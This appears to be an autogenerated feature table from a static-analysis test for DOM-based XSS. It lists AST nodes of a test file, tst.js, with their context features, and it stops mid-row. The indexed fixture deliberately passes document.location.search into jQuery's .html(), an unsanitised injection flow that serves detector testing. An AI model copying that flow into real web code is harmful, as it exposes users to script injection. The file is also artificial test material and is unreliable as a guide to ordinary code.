autogenerated/Xss/DomBasedXss/tst.js:28:5:28:28 | documen ... .search | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:28:5:28:28 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:28:14:28:21 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:28:14:28:21 | location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:28:14:28:21 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:28:23:28:28 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:28:23:28:28 | search | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:28:23:28:28 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:30:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:30:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:30:0 | this | enclosingFunctionBody | document location search | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:30:0 | this | enclosingFunctionName | bar | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:30:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:32:1 | 'arguments' object of function bar | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:32:1 | 'arguments' object of function bar | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:32:1 | 'arguments' object of function bar | enclosingFunctionBody | document location search | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:32:1 | 'arguments' object of function bar | enclosingFunctionName | bar | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:32:1 | 'arguments' object of function bar | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:32:1 | exceptional return of function bar | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:32:1 | exceptional return of function bar | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:32:1 | exceptional return of function bar | enclosingFunctionBody | document location search | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:32:1 | exceptional return of function bar | enclosingFunctionName | bar | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:32:1 | exceptional return of function bar | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:32:1 | functio ... arch;\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:32:1 | functio ... arch;\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:32:1 | functio ... arch;\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:32:1 | return of function bar | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:32:1 | return of function bar | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:32:1 | return of function bar | enclosingFunctionBody | document location search | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:32:1 | return of function bar | enclosingFunctionName | bar | +| autogenerated/Xss/DomBasedXss/tst.js:30:1:32:1 | return of function bar | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:30:10:30:12 | bar | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:30:10:30:12 | bar | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:30:10:30:12 | bar | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:30:10:30:12 | bar | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:30:10:30:12 | bar | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:30:10:30:12 | bar | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:31:10:31:17 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:31:10:31:17 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:31:10:31:17 | document | enclosingFunctionBody | document location search | +| autogenerated/Xss/DomBasedXss/tst.js:31:10:31:17 | document | enclosingFunctionName | bar | +| autogenerated/Xss/DomBasedXss/tst.js:31:10:31:17 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:31:10:31:26 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:31:10:31:26 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:31:10:31:26 | document.location | enclosingFunctionBody | document location search | +| autogenerated/Xss/DomBasedXss/tst.js:31:10:31:26 | document.location | enclosingFunctionName | bar | +| autogenerated/Xss/DomBasedXss/tst.js:31:10:31:26 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:31:10:31:33 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:31:10:31:33 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:31:10:31:33 | documen ... .search | enclosingFunctionBody | document location search | +| autogenerated/Xss/DomBasedXss/tst.js:31:10:31:33 | documen ... .search | enclosingFunctionName | bar | +| autogenerated/Xss/DomBasedXss/tst.js:31:10:31:33 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:31:19:31:26 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:31:19:31:26 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:31:19:31:26 | location | enclosingFunctionBody | document location search | +| autogenerated/Xss/DomBasedXss/tst.js:31:19:31:26 | location | enclosingFunctionName | bar | +| autogenerated/Xss/DomBasedXss/tst.js:31:19:31:26 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:31:28:31:33 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:31:28:31:33 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:31:28:31:33 | search | enclosingFunctionBody | document location search | +| autogenerated/Xss/DomBasedXss/tst.js:31:28:31:33 | search | enclosingFunctionName | bar | +| autogenerated/Xss/DomBasedXss/tst.js:31:28:31:33 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:34:1:34:1 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:34:1:34:1 | $ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:34:1:34:1 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:34:1:34:9 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:34:1:34:9 | $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:34:1:34:9 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:34:1:34:9 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:34:1:34:9 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:34:1:34:9 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:34:1:34:14 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:34:1:34:14 | $('myId').html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:34:1:34:14 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:34:1:34:21 | $('myId ... (bar()) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:34:1:34:21 | $('myId ... (bar()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:34:1:34:21 | $('myId ... (bar()) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:34:1:34:21 | exceptional return of $('myId ... (bar()) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:34:1:34:21 | exceptional return of $('myId ... (bar()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:34:1:34:21 | exceptional return of $('myId ... (bar()) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:34:3:34:8 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:34:3:34:8 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:34:3:34:8 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:34:3:34:8 | 'myId' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:34:3:34:8 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:34:11:34:14 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:34:11:34:14 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:34:11:34:14 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:34:16:34:18 | bar | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:34:16:34:18 | bar | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:34:16:34:18 | bar | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:34:16:34:20 | bar() | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:34:16:34:20 | bar() | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:34:16:34:20 | bar() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:34:16:34:20 | bar() | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:34:16:34:20 | bar() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:34:16:34:20 | exceptional return of bar() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:34:16:34:20 | exceptional return of bar() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:34:16:34:20 | exceptional return of bar() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:36:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:36:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:36:0 | this | enclosingFunctionBody | x x | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:36:0 | this | enclosingFunctionName | baz | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:36:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:38:1 | 'arguments' object of function baz | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 